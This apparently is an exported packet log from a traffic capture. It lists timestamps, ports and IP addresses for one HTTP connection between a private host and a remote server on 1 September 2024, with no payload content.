Sep 1, 2024 20:54:15.928411961 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:15.928473949 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:15.928503036 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:15.928513050 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:15.928540945 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.011966944 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.012026072 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.012096882 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.012294054 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.136284113 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.136338949 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.136353970 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.136362076 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.136383057 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.136404991 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.219670057 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.219749928 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.219832897 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.340745926 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.340924978 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.340934992 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.343319893 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.443449974 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.443463087 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.443480015 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.443624973 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.443624973 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.540374041 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.540458918 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.540539980 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.540606976 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.623720884 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.623790026 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.623867989 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.623959064 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.654056072 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.654103994 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.654114962 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.654120922 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.654141903 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.654160976 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.736751080 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.736816883 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.736834049 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.736896038 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.736931086 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.737010002 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.737021923 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.737065077 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.841989994 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.842046976 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.842123032 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.842133999 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.842170000 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.938052893 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.938107014 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.938117981 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:16.938117981 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:16.938153028 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.021476984 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.021533012 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.021606922 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.021646023 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.035778046 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.035861015 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.035865068 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.035876989 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.035912037 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.035933018 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.165020943 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.165071964 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.165107965 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.165118933 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.165153980 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.190018892 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.190030098 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.190038919 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.190078020 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.190108061 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.541127920 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.541213989 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.541234970 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.541246891 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.541284084 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.541356087 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.541367054 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.541414022 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.541825056 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.541836977 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.541887999 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.542275906 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.542326927 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.570811987 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.570857048 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.570873022 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.570899963 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.570924044 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.761334896 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.761450052 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.761456966 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.761508942 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.784173012 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.784236908 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.784260988 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.784272909 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.784305096 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.784334898 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:17.784477949 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:17.784532070 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.892882109 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.892915010 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.892925024 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.892970085 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.893004894 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.893043995 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.893054008 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.893064022 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.893069983 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.893078089 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.893089056 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.893093109 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.893124104 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.893146038 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.894335032 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.894357920 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.894383907 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.894397020 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.894397020 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.894433975 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.897773027 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.897865057 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.898155928 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.898199081 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.898210049 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.898230076 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.898283958 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.898578882 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.898624897 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.898689032 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.898699999 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.898735046 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.898916006 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.898961067 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.899720907 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.899761915 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.899797916 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.899807930 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.899843931 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.900131941 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.900177002 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.900430918 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.900474072 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.900513887 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.900525093 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.900556087 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.900775909 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.900824070 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.901670933 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.901680946 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.901690006 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.901700020 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.901720047 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.901743889 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:18.983763933 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.983784914 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:18.983918905 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:19.292252064 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:19.292300940 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:19.292320967 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:19.292330980 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:19.292357922 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:19.902440071 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:19.902450085 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:19.902502060 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:19.902523994 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:20.110188961 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.110200882 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.110210896 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.110295057 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:20.110346079 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.110474110 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:20.110474110 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:20.193630934 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.193707943 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:20.193980932 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.194036007 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:20.314950943 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.314966917 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.315041065 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.315083981 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:20.315115929 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:20.315172911 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.315226078 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:20.355038881 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.355050087 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.355108976 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:20.355130911 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.355180025 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:20.355204105 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.355251074 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:20.851528883 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.851656914 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:20.851676941 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:20.851828098 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:21.024311066 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.024379015 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:21.024475098 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.024522066 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:21.076828003 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.076898098 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.076898098 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:21.076909065 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.076936960 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:21.076956987 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:21.077119112 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.077171087 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:21.242567062 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.242589951 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.242652893 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:21.242677927 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:21.326026917 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.326117039 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:21.326714039 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.326767921 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:21.514472961 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.514523983 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.514537096 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.514560938 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:21.514590979 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:21.597629070 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.597654104 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:21.597692966 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:21.597712040 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:22.376036882 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:22.376049995 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:22.376100063 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:22.591695070 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:22.591718912 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:22.591772079 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:22.591789007 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:22.591811895 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:22.591881990 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:22.591881990 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:22.591933012 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:22.801331043 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:22.801372051 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:22.801389933 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:22.801457882 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:22.801625013 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:22.801670074 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:23.121309996 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:23.121483088 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:23.121522903 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:23.121572018 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:23.121577024 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:23.121589899 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:23.121602058 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:23.121613026 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:23.121633053 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:23.121633053 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:23.121673107 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:23.267141104 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:23.267187119 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:23.267334938 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:23.267334938 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:23.350531101 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:23.350557089 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:23.350605011 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:23.350625038 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:24.141320944 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.141345024 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.141494989 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:24.141494989 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:24.333261967 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.333295107 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.333306074 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.333404064 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:24.333497047 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:24.333524942 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.333573103 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:24.416663885 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.416688919 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.416737080 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:24.416762114 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:24.534447908 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.534460068 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.534518003 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:24.617667913 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.617683887 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.617768049 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:24.776494980 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.776524067 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.776624918 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:24.777276993 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:24.871340990 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.871381044 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.871392965 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:24.871427059 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:24.871450901 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:25.013322115 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:25.013375044 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:25.013389111 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:25.013422966 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:25.060894966 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:25.060977936 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:25.060986996 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:25.060992956 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:25.061022997 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:25.061034918 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:25.276339054 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:25.276359081 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:25.276413918 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:25.276447058 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:25.722353935 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:25.722414017 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:25.722421885 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:25.722453117 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:26.553481102 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:26.553559065 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:26.553563118 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:26.553571939 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:26.553603888 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:26.553622961 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:26.553926945 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:26.553945065 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:26.553977013 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:26.553987980 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:26.554019928 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:26.554032087 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:26.554064989 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:26.759126902 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:26.759155035 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:26.759267092 CEST	49704	80	192.168.2.5	185.215.113.100
